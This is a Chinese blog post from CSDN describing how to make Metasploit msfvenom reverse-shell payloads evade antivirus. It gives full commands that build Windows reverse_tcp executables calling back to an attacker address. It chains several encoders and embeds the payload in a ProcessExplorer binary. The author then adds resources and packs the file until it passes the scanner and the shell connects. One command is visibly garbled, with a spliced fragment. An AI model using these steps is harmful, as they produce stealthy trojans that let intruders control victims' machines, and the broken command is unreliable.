2020-12-03

最新推荐文章于 2024-03-19 10:57:22 发布
最新推荐文章于 2024-03-19 10:57:22 发布
阅读量546 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45870307/article/details/110499312
版权

msf生成的payload的简单免杀

通常利用msf生成的payload在不做任何处理的情况下会被杀软直接干掉,所有需要进行一些操作来进行免杀。
这里我使用的是大蜘蛛杀毒软件来做的实验

msf内置编码器
输入msfvenom -l encoders 会出现msf提供的几种编码方式,使用这些编码对payload进行编码
msfvenom - p windows/shell/reverse_tcp -lhsot 本机ip -lport 端口 -e 编码方式 -i 编码次数 -f 文件格式 -o 文件路径与名称
在这里插入图片描述
但仍然报毒在这里插入图片描述

使用多重编码来试试
msfvenom -p windows/shell_reverse_tcp lhost=192.168.114.129 lport=4444 -e x86/context_stat -i 5 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 5 -f exe -o 6.exe

在这里插入图片描述
效果也不行
在这里插入图片描述
用一下自定义可执行文件模板
这里我采用processexplorer
先wget http://download.sysinternals.com/files/ProcessExplorer.zip
再unzip ProcessExplorer.zip
msfvenom -p windows/shell_reverse_tcp lhost=192.168.114.129 lport=4444 -e x86/context_stat -i 5 -f raw | msfvenom -e x86/alpha_upper -a x29 lport=4444 -e x86/context_stat -i 5 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 5 -x miansha/procexp.exe -f exe -o 7.exe
使用-x 指定自定义可执行文件模板
在这里插入图片描述
还是不行在这里插入图片描述
接下来我用一些windows工具来进行免杀操作
将生成好的exe文件放入restorator
这个软件中,将其他软件的资源添给他
在这里插入图片描述
通过加壳工具加壳
在这里插入图片描述

成功通过
因为资源添加的问题,所有payload大了许多
成功上线在这里插入图片描述

夏墨233
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3888
msfvenom的使用
Msfvenom使用指南
m0_57221101的博客
02-08 6128
参数总结 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l 查看所有payload encoder nops。 3. –f (- -help-formats) 输出文件格式。 (- -help-form
msfvenom 基本使用
blackguest07的博客
03-05 1533
msfvenom 基础命令
Msfvenom编码免杀技术实现免杀实战
weixin_43062666的博客
07-10 3013
免杀技术在网络渗透的实战中十分实用,本文将介绍使用msfvenom自带编码免杀工具进行编码免杀,从而实现绕过杀毒软件获得shell的具体方法。 按照文中所讲述的方法制作的木马载荷可以绕开国内所使用的大多数杀毒软件,包括但不限于火绒,腾讯,百度,金山,virustotal沙箱查杀率12,简单但实用...
msfvenom常见的使用命令
路baby的博客
06-24 2685
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线...
2020-12-02
north_gk的博客
12-02 625
3.创建并执行满足下列要求的存储过程。 1)查询经济性质为私营的每个法人银行贷款的总金额和平均金额。 2)查询只在指定银行贷过款的法人的名称。要求银行名称为输人参数,默认值为“工商银行北京A支行”,如果指定的银行不存在,则显示“指定的银行不存在”。 3)删除指定法人在指定日期前的贷款记录。要求法人名称和日期为输人参数,并加密此存储过程的定义。 4)查询在指定银行贷过款且贷款金额高于此银行的平均贷款金额的法人的名称、贷款日期和贷款金额。要求银行名称为输人参数,如果指定的银行不存在,则显示“指定的银行不
2020-12-06
qq_53040634的博客
12-06 3081
标题:对于红外循迹小车的进一步认知、组装、与实验运行。 1.对于模块的重新准备。 这次选择了更加便捷的四路循迹模块。 2.四路循迹模块安装原理图示 3.l289n电机安装同上期一样,需要空出循迹模块的安装位置进行相同的接线。 4. (1)烧录的程序 #-- coding:UTF-8 -- import RPi.GPIO as GPIO import time #小车电机引脚定义 IN1 = 20 IN2 = 21 IN3 = 19 IN4 = 26 ENA = 16 ENB = 13 #小车按键定义
SYN480R_2020-12-03.PDF
08-04
"SYN480R无线接收芯片" SYN480R是一款高集成度、低功耗的单片ASK/OOK射频接收芯片,主要特性包括频率范围300MHz-440MHz,高接收灵敏度(2kbps, BER 10E-2)-108dBm @ 315MHz和-110dBm @ 433.92MHz,低功耗2.8mA/...
eclipse-jee-2020-09-R-win32-x86_64.zip
10-29
标题中的“eclipse-jee-2020-09-R-win32-x86_64.zip”指的是Eclipse IDE for Java EE Developers的2020年9月版本,适用于Windows 32位和64位系统的安装包。Eclipse是一款著名的开源集成开发环境(IDE),广泛用于...
CBM209X UMPToolV7200(2020-03-19).rar
08-22
《CBM209X UMPToolV7200(2020-03-19):U盘量产修复与存储器管理详解》 在IT领域中,存储设备的管理和维护是一项至关重要的任务,尤其是对于U盘这类便携式存储器。"CBM209X UMPToolV7200(2020-03-19)"是一个专用于...
eclipse_java_2020-03安装包.7z
03-30
"eclipse_java_2020-03安装包.7z" 和 "eclipse-java-2020-03-R-win32-x86_64-Windows安装包.zip" 都是Eclipse针对Java开发者的2020年3月版本的安装文件,适用于Windows 64位操作系统。这两个文件可能包含了不同的...
疫情实时爬取-2020-03-27-12-12-46.xls
06-12
2020年3月27日爬取的疫情实时
msfvenom简单命令
Programmer_huangtao的博客
06-16 688
msfvenom命令行选项如下: Options: -p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块...
web渗透之学习笔记
shy的博客
10-15 844
一、sqlmap -p 指定注入点 –technique 指定注入类型 B:Boolean-based blind(布尔型注入) E:Error-based(报错型注入) U:Union query-based(可联合查询注入) S:Stacked queries(可多语句查询注入) T:Time-based blind(基于时间延迟注入) Q:Inline queries(嵌套查询注入) oracle 默认的端bai口号是1521 ...
利用MSF生成php,windows,Linux三类木马
2301_76786857的博客
03-19 1988
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom制作主控与被控端
angleoldhen的专栏
07-28 362
msfvenom如何制作主控与被控端 ,如何编码,如何使用upx加壳
msfvenome木马生成的实战及其文档翻译(kali-01)
进击的小小白
05-31 2614
MSFVENOM(1) Metasploit Framework - msfvenom MSFVENOM(1) NAME msfvenom - Payload Generator and Encoder SYNOPSIS msfvenom [options] <var=val> DESCRIPT...
修改msfvenom unicode编码器的默认寄存器
qq726232111的博客
01-07 267
修改msfvenom unicode编码器的默认寄存器
顶尖电子称条码秤LS系列称固件,最新固件,固件
最新发布
08-28
顶尖电子称条码秤LS系列称固件,最新固件,固件
用XML描述下列数据。杰普学号01 男 2020-12-18 杰普学号02 男 2020-12-18 杰普学号032020-12-18 杰普学号04 男 2020-12-18 杰普学号05 女 2020-12-18
03-07
<?xml version="1." encoding="UTF-8"?> <id>01 男 <date>202-12-18 ... <id>03 男 <date>202-12-18 <id>04 男 <date>202-12-18 <id>05 女 <date>202-12-18 </students>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值